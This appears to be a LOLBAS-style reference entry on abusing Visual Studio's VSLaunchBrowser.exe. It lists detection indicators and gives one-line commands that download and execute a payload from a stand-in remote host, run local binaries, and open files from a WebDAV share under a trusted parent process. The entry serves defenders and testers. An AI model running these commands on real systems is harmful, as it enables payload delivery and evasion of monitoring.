.. /VSLaunchBrowser.exe
Star

Download (INetCache)

Microsoft Visual Studio browser launcher tool for web applications debugging

Paths:

C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe
C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe

Acknowledgements:

Avihay Eldad (@AvihayEldad)

Detections:

IOC: cmd.exe as sub-process of VSLaunchBrowser
IOC: URL on a VSLaunchBrowser command line
IOC: VSLaunchBrowser making unexpected network connections or DNS requests

Download

Download and execute payload from remote server
```
VSLaunchBrowser.exe .exe http://example.com/payload
```
Use case
It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.

Privileges required
User

Operating systems
Windows

ATT&CK® technique
T1105
Tags
Download: INetCache
INetCache downloaders typically store files in a randomly-named folder under %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE, having added [1] or a higher number between the file's name and its extension.
If you downloaded a file named XYZ.exe, the full path of the downloaded file can be obtained by executing the following command:
cmd.exe /c "where /r %LOCALAPPDATA%\Microsoft\Windows\INetCache XYZ*"

Execute

Execute payload via VSLaunchBrowser as parent process
```
VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
```
Use case
It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.

Privileges required
User

Operating systems
Windows

ATT&CK® technique
T1127
Execute payload from WebDAV server via VSLaunchBrowser as parent process
```
VSLaunchBrowser.exe .exe \\Server\Path\file
```
Use case
It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.

Privileges required
User

Operating systems
Windows

ATT&CK® technique
T1127